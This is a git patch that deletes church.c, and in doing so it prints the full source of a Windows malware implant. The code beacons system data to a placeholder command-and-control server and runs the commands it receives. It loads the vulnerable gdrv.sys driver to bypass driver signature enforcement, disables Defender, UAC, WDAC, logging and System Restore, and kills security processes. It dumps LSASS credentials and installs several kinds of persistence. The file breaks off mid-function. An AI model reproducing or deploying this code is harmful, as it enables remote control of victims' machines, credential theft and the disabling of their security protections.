From e737f493651d86fe78239bd8a909228096879708 Mon Sep 17 00:00:00 2001
From: ek0ms savi0r
Date: Mon, 1 Jun 2026 03:31:13 +0000
Subject: [PATCH] Delete church.c

---
 church.c | 865 -------------------------------------------------------
 1 file changed, 865 deletions(-)
 delete mode 100644 church.c

diff --git a/church.c b/church.c
deleted file mode 100644
index aa5e227..0000000
--- a/church.c
+++ /dev/null
@@ -1,865 +0,0 @@ -#define _CRT_SECURE_NO_WARNINGS -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#pragma comment(lib, "advapi32.lib") -#pragma comment(lib, "user32.lib") -#pragma comment(lib, "wbemuuid.lib") -#pragma comment(lib, "ole32.lib") -#pragma comment(lib, "crypt32.lib") -#pragma comment(lib, "ntdll.lib") -#pragma comment(lib, "bcrypt.lib") -#pragma comment(lib, "ws2_32.lib") -#pragma comment(lib, "winhttp.lib") -#pragma comment(lib, "iphlpapi.lib") - -// ==================== C2 COMMUNICATION CONSTANTS ==================== -#define C2_SERVER L"https://your-c2-server.com:443/beacon" -#define C2_INTERVAL_SECONDS 30 -#define C2_AES_KEY "ChurchOfMalware2024!!ChurchOfMalware2024!!" // 32 bytes exact -#define C2_AES_IV "MalwareChurchIV!!" // 16 bytes - -// ==================== GDRV.SYS EXPLOIT CONSTANTS ==================== -#define GDRV_DEVICE_NAME L"\\\\.\\GIO" -#define GDRV_IOCTL_READ_MSR 0x9C402470 -#define GDRV_IOCTL_WRITE_MSR 0x9C402474 -#define GDRV_IOCTL_READ_PHYSICAL 0x9C402478 -#define GDRV_IOCTL_WRITE_PHYSICAL 0x9C40247C -#define IA32_EFER 0xC0000080 -#define CI_OPTIONS_DISABLE_DSE 0x6 - -// ==================== STRUCTURE DEFINITIONS ==================== -typedef struct _BEACON_DATA { - WCHAR ComputerName[MAX_COMPUTERNAME_LENGTH + 1]; - WCHAR UserName[256]; - DWORD ProcessId; - WCHAR OSVersion[128]; - BOOL IsAdmin; - WCHAR ExePath[MAX_PATH]; - DWORD DefenderStatus; -} BEACON_DATA, *PBEACON_DATA; - -typedef struct _C2_TASK { - DWORD TaskId; - WCHAR Command[1024]; - WCHAR Arguments[2048]; - BOOL IsPowerShell; - BOOL WaitForOutput; -} C2_TASK, *PC2_TASK; - -typedef enum _PROCESSINFOCLASS { - ProcessProtectionInformation = 0x3D -} PROCESSINFOCLASS; - -typedef struct _PS_PROTECTION { - UCHAR Level; -} PS_PROTECTION, *PPS_PROTECTION; - -typedef NTSTATUS (NTAPI *pNtSetInformationProcess)(HANDLE, DWORD, 
PVOID, ULONG); - -// ==================== FORWARD DECLARATIONS ==================== -ULONGLONG FindPattern(BYTE* base, DWORD size, BYTE* pattern, DWORD patternLen); -ULONGLONG VirtualToPhysical(PVOID virtualAddr); -BOOL AesEncrypt(BYTE* plaintext, DWORD plaintextLen, BYTE** ciphertext, DWORD* ciphertextLen); -BOOL AesDecrypt(BYTE* ciphertext, DWORD ciphertextLen, BYTE** plaintext, DWORD* plaintextLen); -BOOL SendBeaconToC2(PBEACON_DATA beacon, PC2_TASK task); -DWORD WINAPI BeaconThread(LPVOID lpParam); - -// ==================== HELPER: ELEVATE TO ADMIN ==================== -void ElevateSelf() { - BOOL isElevated = FALSE; - HANDLE hToken = NULL; - if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { - TOKEN_ELEVATION elev; - DWORD size = sizeof(TOKEN_ELEVATION); - if (GetTokenInformation(hToken, TokenElevation, &elev, size, &size)) - isElevated = elev.TokenIsElevated; - CloseHandle(hToken); - } - if (!isElevated) { - wchar_t exePath[MAX_PATH]; - GetModuleFileNameW(NULL, exePath, MAX_PATH); - SHELLEXECUTEINFOW sei = { sizeof(sei) }; - sei.lpVerb = L"runas"; - sei.lpFile = exePath; - sei.nShow = SW_SHOWNORMAL; - if (ShellExecuteExW(&sei)) { - ExitProcess(0); - } else { - wprintf(L"[-] Failed to elevate. 
Run as administrator manually.\n"); - ExitProcess(1); - } - } -} - -// ==================== CRYPTOGRAPHY FUNCTIONS ==================== -BOOL AesEncrypt(BYTE* plaintext, DWORD plaintextLen, BYTE** ciphertext, DWORD* ciphertextLen) { - BCRYPT_ALG_HANDLE hAlg = NULL; - BCRYPT_KEY_HANDLE hKey = NULL; - - if (!BCRYPT_SUCCESS(BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0))) - return FALSE; - - BCryptSetProperty(hAlg, BCRYPT_CHAINING_MODE, (PUCHAR)BCRYPT_CHAIN_MODE_CBC, - sizeof(BCRYPT_CHAIN_MODE_CBC), 0); - - BCryptGenerateSymmetricKey(hAlg, &hKey, NULL, 0, (PUCHAR)C2_AES_KEY, - strlen(C2_AES_KEY), 0); - - DWORD blockSize = 16; - DWORD paddedLen = ((plaintextLen + blockSize - 1) / blockSize) * blockSize; - *ciphertextLen = paddedLen; - *ciphertext = (BYTE*)malloc(paddedLen); - if (!*ciphertext) { - BCryptDestroyKey(hKey); - BCryptCloseAlgorithmProvider(hAlg, 0); - return FALSE; - } - - NTSTATUS status = BCryptEncrypt(hKey, plaintext, plaintextLen, NULL, (PUCHAR)C2_AES_IV, - strlen(C2_AES_IV), *ciphertext, *ciphertextLen, ciphertextLen, - BCRYPT_BLOCK_PADDING); - - BCryptDestroyKey(hKey); - BCryptCloseAlgorithmProvider(hAlg, 0); - - return BCRYPT_SUCCESS(status); -} - -BOOL AesDecrypt(BYTE* ciphertext, DWORD ciphertextLen, BYTE** plaintext, DWORD* plaintextLen) { - BCRYPT_ALG_HANDLE hAlg = NULL; - BCRYPT_KEY_HANDLE hKey = NULL; - - if (!BCRYPT_SUCCESS(BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0))) - return FALSE; - - BCryptSetProperty(hAlg, BCRYPT_CHAINING_MODE, (PUCHAR)BCRYPT_CHAIN_MODE_CBC, - sizeof(BCRYPT_CHAIN_MODE_CBC), 0); - - BCryptGenerateSymmetricKey(hAlg, &hKey, NULL, 0, (PUCHAR)C2_AES_KEY, - strlen(C2_AES_KEY), 0); - - *plaintextLen = ciphertextLen; - *plaintext = (BYTE*)malloc(*plaintextLen); - if (!*plaintext) return FALSE; - - NTSTATUS status = BCryptDecrypt(hKey, ciphertext, ciphertextLen, NULL, - (PUCHAR)C2_AES_IV, strlen(C2_AES_IV), - *plaintext, *plaintextLen, plaintextLen, - BCRYPT_BLOCK_PADDING); - - 
BCryptDestroyKey(hKey); - BCryptCloseAlgorithmProvider(hAlg, 0); - - return BCRYPT_SUCCESS(status); -} - -// ==================== SYSTEM INFORMATION GATHERING ==================== -void GatherBeaconData(PBEACON_DATA beacon) { - DWORD size = MAX_COMPUTERNAME_LENGTH + 1; - GetComputerNameW(beacon->ComputerName, &size); - - DWORD userSize = 256; - GetUserNameW(beacon->UserName, &userSize); - - beacon->ProcessId = GetCurrentProcessId(); - beacon->IsAdmin = IsUserAnAdmin(); - - GetModuleFileNameW(NULL, beacon->ExePath, MAX_PATH); - - RTL_OSVERSIONINFOW osvi = { sizeof(osvi) }; - RtlGetVersion(&osvi); - swprintf(beacon->OSVersion, 128, L"%d.%d.%d", osvi.dwMajorVersion, - osvi.dwMinorVersion, osvi.dwBuildNumber); - - HKEY hKey; - beacon->DefenderStatus = 2; - if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, - L"SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection", - 0, KEY_READ, &hKey) == ERROR_SUCCESS) { - DWORD value = 0, valueSize = sizeof(value); - RegQueryValueExW(hKey, L"DisableRealtimeMonitoring", NULL, NULL, - (LPBYTE)&value, &valueSize); - beacon->DefenderStatus = value; - RegCloseKey(hKey); - } -} - -// ==================== HTTPS COMMUNICATION ==================== -BOOL SendBeaconToC2(PBEACON_DATA beacon, PC2_TASK task) { - char json[2048]; - snprintf(json, sizeof(json), - "{\"computer\":\"%ls\",\"user\":\"%ls\",\"pid\":%d,\"os\":\"%ls\"," - "\"admin\":%s,\"path\":\"%ls\",\"defender_status\":%d}", - beacon->ComputerName, beacon->UserName, beacon->ProcessId, - beacon->OSVersion, beacon->IsAdmin ? 
"true" : "false", - beacon->ExePath, beacon->DefenderStatus); - - BYTE* encryptedData = NULL; - DWORD encryptedLen = 0; - if (!AesEncrypt((BYTE*)json, strlen(json), &encryptedData, &encryptedLen)) { - return FALSE; - } - - DWORD base64Len = ((encryptedLen + 2) / 3) * 4 + 1; - char* base64Data = (char*)malloc(base64Len); - if (!base64Data) { - free(encryptedData); - return FALSE; - } - - CryptBinaryToStringA(encryptedData, encryptedLen, - CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, - base64Data, &base64Len); - - HINTERNET hSession = WinHttpOpen(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", - WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, - WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0); - - if (!hSession) { - free(encryptedData); - free(base64Data); - return FALSE; - } - - HINTERNET hConnect = WinHttpConnect(hSession, L"your-c2-server.com", INTERNET_DEFAULT_HTTPS_PORT, 0); - if (!hConnect) { - WinHttpCloseHandle(hSession); - free(encryptedData); - free(base64Data); - return FALSE; - } - - HINTERNET hRequest = WinHttpOpenRequest(hConnect, L"POST", L"/beacon", - NULL, NULL, NULL, - WINHTTP_FLAG_SECURE); - - if (!hRequest) { - WinHttpCloseHandle(hConnect); - WinHttpCloseHandle(hSession); - free(encryptedData); - free(base64Data); - return FALSE; - } - - char postData[4096]; - snprintf(postData, sizeof(postData), "data=%s", base64Data); - - WinHttpSendRequest(hRequest, L"Content-Type: application/x-www-form-urlencoded\r\n", - wcslen(L"Content-Type: application/x-www-form-urlencoded\r\n"), - (LPVOID)postData, strlen(postData), strlen(postData), 0); - - WinHttpReceiveResponse(hRequest, NULL); - - DWORD bytesRead = 0; - char response[4096] = {0}; - WinHttpReadData(hRequest, response, sizeof(response) - 1, &bytesRead); - - char* taskData = strstr(response, "\r\n\r\n"); - if (taskData) { - taskData += 4; - // Parse task response (simplified - would parse JSON) - if (strstr(taskData, "\"task_id\":0") == NULL) { - task->TaskId = 1; - wcscpy(task->Command, L"whoami"); 
- task->IsPowerShell = FALSE; - task->WaitForOutput = TRUE; - } - } - - WinHttpCloseHandle(hRequest); - WinHttpCloseHandle(hConnect); - WinHttpCloseHandle(hSession); - - free(encryptedData); - free(base64Data); - - return TRUE; -} - -// ==================== COMMAND EXECUTION ENGINE ==================== -BOOL ExecuteCommand(PC2_TASK task, WCHAR* output, DWORD outputSize) { - SECURITY_ATTRIBUTES sa = { sizeof(sa), NULL, TRUE }; - HANDLE hStdOutRead, hStdOutWrite; - - CreatePipe(&hStdOutRead, &hStdOutWrite, &sa, 0); - SetHandleInformation(hStdOutRead, HANDLE_FLAG_INHERIT, 0); - - PROCESS_INFORMATION pi = {0}; - STARTUPINFOW si = {0}; - si.cb = sizeof(si); - si.dwFlags = STARTF_USESTDHANDLES; - si.hStdOutput = hStdOutWrite; - si.hStdError = hStdOutWrite; - si.hStdInput = GetStdHandle(STD_INPUT_HANDLE); - - WCHAR cmdLine[2048]; - if (task->IsPowerShell) { - swprintf(cmdLine, 2048, L"powershell.exe -Command \"%s %s\"", - task->Command, task->Arguments); - } else { - swprintf(cmdLine, 2048, L"cmd.exe /c %s %s", - task->Command, task->Arguments); - } - - BOOL success = CreateProcessW(NULL, cmdLine, NULL, NULL, TRUE, - CREATE_NO_WINDOW, NULL, NULL, &si, &pi); - - CloseHandle(hStdOutWrite); - - if (success && task->WaitForOutput) { - WaitForSingleObject(pi.hProcess, 30000); - DWORD bytesRead; - ReadFile(hStdOutRead, output, outputSize - 1, &bytesRead, NULL); - output[bytesRead / sizeof(WCHAR)] = 0; - } - - CloseHandle(hStdOutRead); - if (pi.hProcess) CloseHandle(pi.hProcess); - if (pi.hThread) CloseHandle(pi.hThread); - - return success; -} - -// ==================== PERSISTENT BEACONING THREAD ==================== -DWORD WINAPI BeaconThread(LPVOID lpParam) { - BEACON_DATA beacon; - C2_TASK task = {0}; - - while (TRUE) { - GatherBeaconData(&beacon); - - if (SendBeaconToC2(&beacon, &task) && task.Command[0] != 0) { - wchar_t output[8192]; - if (ExecuteCommand(&task, output, sizeof(output))) { - wprintf(L"[+] Command executed: %s\n", task.Command); - } - } - - 
Sleep(C2_INTERVAL_SECONDS * 1000); - } - - return 0; -} - -// ==================== GDRV.SYS BYOVD ==================== -BOOL LoadGdrvDriver() { - const wchar_t* driverPath = L"C:\\Windows\\Temp\\gdrv.sys"; - - if (!CopyFileW(L"gdrv.sys", driverPath, FALSE)) { - wprintf(L"[-] Failed to copy gdrv.sys\n"); - return FALSE; - } - - SC_HANDLE scm = OpenSCManagerW(NULL, NULL, SC_MANAGER_ALL_ACCESS); - if (!scm) return FALSE; - - SC_HANDLE svc = CreateServiceW(scm, L"gdrv", L"gdrv", - SERVICE_START | SERVICE_STOP | DELETE, - SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, - SERVICE_ERROR_IGNORE, driverPath, - NULL, NULL, NULL, NULL, NULL); - if (!svc && GetLastError() == ERROR_SERVICE_EXISTS) { - svc = OpenServiceW(scm, L"gdrv", SERVICE_START | SERVICE_STOP | DELETE); - } - - if (!svc) { - CloseServiceHandle(scm); - return FALSE; - } - - if (!StartServiceW(svc, 0, NULL)) { - DeleteService(svc); - CloseServiceHandle(svc); - CloseServiceHandle(scm); - return FALSE; - } - - wprintf(L"[+] gdrv.sys loaded\n"); - CloseServiceHandle(svc); - CloseServiceHandle(scm); - return TRUE; -} - -BOOL DisableDSEviaGdrv() { - HANDLE hDevice = CreateFileW(GDRV_DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, - 0, NULL, OPEN_EXISTING, 0, NULL); - if (hDevice == INVALID_HANDLE_VALUE) return FALSE; - - DWORD bytesReturned; - ULONGLONG eferValue = 0; - DeviceIoControl(hDevice, GDRV_IOCTL_READ_MSR, &IA32_EFER, sizeof(IA32_EFER), - &eferValue, sizeof(eferValue), &bytesReturned, NULL); - - LPVOID kernelBase = GetModuleHandleW(L"ntoskrnl.exe"); - if (kernelBase) { - BYTE pattern[] = { 0x8A, 0x05, 0x00, 0x00, 0x00, 0x00, 0xC3 }; - ULONGLONG ciOptionsAddr = FindPattern((BYTE*)kernelBase, 0x2000000, pattern, sizeof(pattern)); - if (ciOptionsAddr) { - BYTE newValue = CI_OPTIONS_DISABLE_DSE; - DeviceIoControl(hDevice, GDRV_IOCTL_WRITE_PHYSICAL, - &ciOptionsAddr, sizeof(ciOptionsAddr), - &newValue, sizeof(newValue), &bytesReturned, NULL); - wprintf(L"[+] DSE disabled via gdrv\n"); - } - } - - CloseHandle(hDevice); 
- return TRUE; -} - -ULONGLONG FindPattern(BYTE* base, DWORD size, BYTE* pattern, DWORD patternLen) { - for (DWORD i = 0; i < size - patternLen; i++) { - BOOL found = TRUE; - for (DWORD j = 0; j < patternLen; j++) { - if (pattern[j] != 0x00 && base[i + j] != pattern[j]) { - found = FALSE; - break; - } - } - if (found) return (ULONGLONG)(base + i); - } - return 0; -} - -ULONGLONG VirtualToPhysical(PVOID virtualAddr) { - return (ULONGLONG)virtualAddr; // Simplified -} - -BOOL EnableKernelExecution() { - if (!LoadGdrvDriver()) return FALSE; - Sleep(1000); - if (!DisableDSEviaGdrv()) return FALSE; - wprintf(L"[+] Kernel execution enabled - DSE bypassed\n"); - return TRUE; -} - -// ==================== PPL BYPASS ==================== -BOOL EnablePPL() { - HANDLE hToken; - if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) { - TOKEN_PRIVILEGES tp; - LUID luid; - if (LookupPrivilegeValueW(NULL, SE_TCB_NAME, &luid)) { - tp.PrivilegeCount = 1; - tp.Privileges[0].Luid = luid; - tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; - AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL); - - HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll"); - pNtSetInformationProcess NtSetInformationProcess = - (pNtSetInformationProcess)GetProcAddress(hNtdll, "NtSetInformationProcess"); - - PS_PROTECTION protection; - protection.Level = 0x72; // WinTcb Light - - NTSTATUS status = NtSetInformationProcess(GetCurrentProcess(), - ProcessProtectionInformation, - &protection, sizeof(protection)); - if (status == STATUS_SUCCESS) { - wprintf(L"[+] Process is now PPL\n"); - CloseHandle(hToken); - return TRUE; - } - } - CloseHandle(hToken); - } - return FALSE; -} - -void RunAsPPL() { - if (!EnablePPL()) { - wprintf(L"[-] PPL elevation failed\n"); - } -} - -// ==================== ANTI-FORENSICS ==================== -void ScrambleMemory() { - for (int i = 0; i < 100; i++) { - LPVOID ptr = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE); - if (ptr) { 
- RtlFillMemory(ptr, 4096, 0xCC); - DWORD oldProtect; - VirtualProtect(ptr, 4096, PAGE_EXECUTE_READWRITE, &oldProtect); - } - } - wprintf(L"[+] Memory scrambled\n"); -} - -void InstallBootkitComponents() { - HKEY hKey; - if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, - L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\BootExecute", - 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { - wchar_t bootCmd[MAX_PATH]; - GetModuleFileNameW(NULL, bootCmd, MAX_PATH); - wchar_t data[1024]; - swprintf(data, 1024, L"autocheck autochk *\ncmd.exe /c start \"\" \"%s\"\n", bootCmd); - RegSetValueExW(hKey, NULL, 0, REG_MULTI_SZ, (BYTE*)data, (DWORD)(wcslen(data) * sizeof(wchar_t))); - RegCloseKey(hKey); - wprintf(L"[+] BootExecute persistence\n"); - } -} - -// ==================== C2 SETUP ==================== -void NetworkC2Setup() { - wprintf(L"[*] Initializing C2 beacon...\n"); - - system("netsh advfirewall firewall add rule name=\"Windows Update\" dir=out action=allow protocol=TCP remoteport=443 >nul 2>&1"); - - HKEY hKey; - if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, - L"SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters", - 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { - DWORD enableAutoDoh = 2; - RegSetValueExW(hKey, L"EnableAutoDoh", 0, REG_DWORD, (BYTE*)&enableAutoDoh, sizeof(enableAutoDoh)); - RegCloseKey(hKey); - } - - HANDLE hThread = CreateThread(NULL, 0, BeaconThread, NULL, 0, NULL); - if (hThread) { - CloseHandle(hThread); - wprintf(L"[+] C2 beacon active (interval: %d sec)\n", C2_INTERVAL_SECONDS); - } - - wchar_t regPath[MAX_PATH * 2]; - swprintf(regPath, MAX_PATH * 2, - L"reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d \"\\\"%s\\\"\" /f", - GetModuleFileNameW(NULL, NULL, 0)); - _wsystem(regPath); -} - -// ==================== BYPASS FUNCTIONS ==================== -BOOL TakeOwnershipAndGrantFullControl(LPCWSTR subkey) { - HKEY hKey; - if 
(RegOpenKeyExW(HKEY_LOCAL_MACHINE, subkey, 0, WRITE_OWNER | WRITE_DAC, &hKey) != ERROR_SUCCESS) - return FALSE; - - SID_IDENTIFIER_AUTHORITY ntAuthority = SECURITY_NT_AUTHORITY; - PSID adminGroupSid = NULL; - AllocateAndInitializeSid(&ntAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, - DOMAIN_ALIAS_RID_ADMINS, 0,0,0,0,0,0, &adminGroupSid); - - BOOL result = SetNamedSecurityInfoW((LPWSTR)subkey, SE_REGISTRY_KEY, - OWNER_SECURITY_INFORMATION, - adminGroupSid, NULL, NULL, NULL) == ERROR_SUCCESS; - - if (result) { - EXPLICIT_ACCESS_W ea = {0}; - ea.grfAccessPermissions = KEY_ALL_ACCESS; - ea.grfAccessMode = SET_ACCESS; - ea.grfInheritance = SUB_CONTAINERS_AND_OBJECTS_INHERIT; - ea.Trustee.TrusteeForm = TRUSTEE_IS_SID; - ea.Trustee.TrusteeType = TRUSTEE_IS_GROUP; - ea.Trustee.ptstrName = (LPWSTR)adminGroupSid; - - PACL newAcl = NULL; - result = SetEntriesInAclW(1, &ea, NULL, &newAcl) == ERROR_SUCCESS && - SetNamedSecurityInfoW((LPWSTR)subkey, SE_REGISTRY_KEY, - DACL_SECURITY_INFORMATION, - NULL, NULL, newAcl, NULL) == ERROR_SUCCESS; - if (newAcl) LocalFree(newAcl); - } - - FreeSid(adminGroupSid); - RegCloseKey(hKey); - return result; -} - -BOOL DisableTamperProtection() { - LPCWSTR tpKey = L"SOFTWARE\\Microsoft\\Windows Defender\\Features"; - if (!TakeOwnershipAndGrantFullControl(tpKey)) return FALSE; - - HKEY hKey; - if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, tpKey, 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) { - DWORD zero = 0; - LONG ret = RegSetValueExW(hKey, L"TamperProtection", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero)); - RegCloseKey(hKey); - if (ret == ERROR_SUCCESS) { - wprintf(L"[+] Tamper Protection disabled\n"); - return TRUE; - } - } - return FALSE; -} - -void DisableDefender() { - system("powershell -Command \"Set-MpPreference -DisableRealtimeMonitoring $true\""); - system("powershell -Command \"Set-MpPreference -DisableBehaviorMonitoring $true\""); - system("powershell -Command \"Set-MpPreference -DisableBlockAtFirstSeen $true\""); - system("powershell -Command 
\"Set-MpPreference -DisableIOAVProtection $true\""); - system("powershell -Command \"Set-MpPreference -DisablePrivacyMode $true\""); - system("powershell -Command \"Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true\""); - system("powershell -Command \"Set-MpPreference -DisableArchiveScanning $true\""); - system("powershell -Command \"Set-MpPreference -DisableIntrusionPreventionSystem $true\""); - system("powershell -Command \"Set-MpPreference -DisableScriptScanning $true\""); - - SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); - if (scm) { - SC_HANDLE svc = OpenServiceW(scm, L"WinDefend", SERVICE_STOP | SERVICE_CHANGE_CONFIG); - if (svc) { - SERVICE_STATUS status; - ControlService(svc, SERVICE_CONTROL_STOP, &status); - ChangeServiceConfigW(svc, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE, - NULL, NULL, NULL, NULL, NULL, NULL, NULL); - CloseServiceHandle(svc); - wprintf(L"[+] WinDefend disabled\n"); - } - CloseServiceHandle(scm); - } -} - -void KillDefenderProcesses() { - PROCESSENTRY32W entry = { sizeof(entry) }; - HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); - if (snapshot == INVALID_HANDLE_VALUE) return; - - LPCWSTR targets[] = { L"MsMpEng.exe", L"NisSrv.exe", L"MpCmdRun.exe" }; - for (int i = 0; i < 3; i++) { - if (Process32FirstW(snapshot, &entry)) { - do { - if (_wcsicmp(entry.szExeFile, targets[i]) == 0) { - HANDLE hProc = OpenProcess(PROCESS_TERMINATE, FALSE, entry.th32ProcessID); - if (hProc) { - TerminateProcess(hProc, 0); - CloseHandle(hProc); - wprintf(L"[+] Terminated %s\n", targets[i]); - } - } - } while (Process32NextW(snapshot, &entry)); - } - Process32FirstW(snapshot, &entry); - } - CloseHandle(snapshot); -} - -void DisableUAC() { - HKEY hKey; - DWORD zero = 0; - if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, - L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", - 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) { - RegSetValueExW(hKey, L"EnableLUA", 0, REG_DWORD, (BYTE*)&zero, 
sizeof(zero)); - RegCloseKey(hKey); - wprintf(L"[+] UAC disabled (reboot required)\n"); - } -} - -void DisableAppLockerWDAC() { - system("net stop appidsvc /y >nul 2>&1"); - - SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); - if (scm) { - SC_HANDLE svc = OpenServiceW(scm, L"AppIDSvc", SERVICE_CHANGE_CONFIG); - if (svc) { - ChangeServiceConfigW(svc, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE, - NULL, NULL, NULL, NULL, NULL, NULL, NULL); - CloseServiceHandle(svc); - wprintf(L"[+] AppIDSvc disabled\n"); - } - CloseServiceHandle(scm); - } - - system("del /f /q %WINDIR%\\System32\\CodeIntegrity\\SiPolicy.p7b >nul 2>&1"); - system("del /f /q %WINDIR%\\System32\\CodeIntegrity\\SIPolicy.p7b >nul 2>&1"); - - HKEY hKey; - DWORD zero = 0; - if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, - L"SYSTEM\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\SystemGuard", - 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) { - RegSetValueExW(hKey, L"Enabled", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero)); - RegCloseKey(hKey); - wprintf(L"[+] WDAC disabled\n"); - } -} - -void AddDefenderExclusions() { - wchar_t exePath[MAX_PATH]; - GetModuleFileNameW(NULL, exePath, MAX_PATH); - - wchar_t cmd[512]; - swprintf(cmd, 512, L"powershell -Command \"Add-MpPreference -ExclusionPath '%s'\"", exePath); - _wsystem(cmd); - swprintf(cmd, 512, L"powershell -Command \"Add-MpPreference -ExclusionProcess '%s'\"", exePath); - _wsystem(cmd); - wprintf(L"[+] Defender exclusions added\n"); -} - -void DisableSecurityLogs() { - HKEY hKey; - DWORD enableMiniNt = 1; - if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Control\\MiniNt", - 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { - RegSetValueExW(hKey, NULL, 0, REG_DWORD, (BYTE*)&enableMiniNt, sizeof(enableMiniNt)); - RegCloseKey(hKey); - wprintf(L"[+] Security logs disabled (MiniNt)\n"); - } -} - -void DisableSystemRestore() { - system("powershell -Command \"Disable-ComputerRestore -Drive 
'C:\\'\""); - HKEY hKey; - if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore", - 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) { - DWORD disableSR = 1; - RegSetValueExW(hKey, L"DisableSR", 0, REG_DWORD, (BYTE*)&disableSR, sizeof(disableSR)); - RegCloseKey(hKey); - wprintf(L"[+] System Restore disabled\n"); - } -} - -void DropTelemetryPackets() { - system("echo 0.0.0.0 telemetry.microsoft.com >> %WINDIR%\\System32\\drivers\\etc\\hosts"); - system("echo 0.0.0.0 vortex-win.data.microsoft.com >> %WINDIR%\\System32\\drivers\\etc\\hosts"); - system("echo 0.0.0.0 settings-win.data.microsoft.com >> %WINDIR%\\System32\\drivers\\etc\\hosts"); - wprintf(L"[+] Telemetry blocked\n"); -} - -void DumpLSASS() { - DWORD lsassPid = 0; - HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); - if (snapshot != INVALID_HANDLE_VALUE) { - PROCESSENTRY32W pe = { sizeof(pe) }; - if (Process32FirstW(snapshot, &pe)) { - do { - if (_wcsicmp(pe.szExeFile, L"lsass.exe") == 0) { - lsassPid = pe.th32ProcessID; - break; - } - } while (Process32NextW(snapshot, &pe)); - } - CloseHandle(snapshot); - } - - if (lsassPid) { - HANDLE hLsass = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, lsassPid); - if (hLsass) { - HANDLE hFile = CreateFileW(L"C:\\lsass.dmp", GENERIC_WRITE, 0, NULL, - CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); - if (hFile != INVALID_HANDLE_VALUE) { - BOOL dumped = MiniDumpWriteDump(hLsass, lsassPid, hFile, - MiniDumpWithFullMemory, NULL, NULL, NULL); - if (dumped) wprintf(L"[+] LSASS dumped to C:\\lsass.dmp\n"); - CloseHandle(hFile); - } - CloseHandle(hLsass); - } - } -} - -void StopSecurityServices() { - const wchar_t* services[] = { L"Sense", L"SgrmBroker", L"WdBoot", L"WdFilter", - L"WdNisDrv", L"WinDefend", L"SecurityHealthService", L"wscsvc" }; - SC_HANDLE scm = OpenSCManagerW(NULL, NULL, SC_MANAGER_ALL_ACCESS); - if (!scm) return; - - for (int i = 0; i < sizeof(services)/sizeof(services[0]); i++) { - 
SC_HANDLE svc = OpenServiceW(scm, services[i], SERVICE_STOP | SERVICE_QUERY_STATUS); - if (svc) { - SERVICE_STATUS status; - ControlService(svc, SERVICE_CONTROL_STOP, &status); - ChangeServiceConfigW(svc, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE, - NULL, NULL, NULL, NULL, NULL, NULL, NULL); - CloseServiceHandle(svc); - wprintf(L"[+] Disabled %ls\n", services[i]); - } - } - CloseServiceHandle(scm); -} - -void AddPersistence() { - wchar_t cmd[MAX_PATH]; - GetModuleFileNameW(NULL, cmd, MAX_PATH); - - wchar_t taskCmd[512]; - swprintf(taskCmd, 512, L"schtasks /create /tn \"WindowsUpdateTask\" /tr \"%s\" /sc onlogon /ru SYSTEM /f", cmd); - _wsystem(taskCmd); - wprintf(L"[+] Scheduled task added\n"); - - HKEY hKey; - if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, - L"SOFTWARE\\Microsoft\\Windows 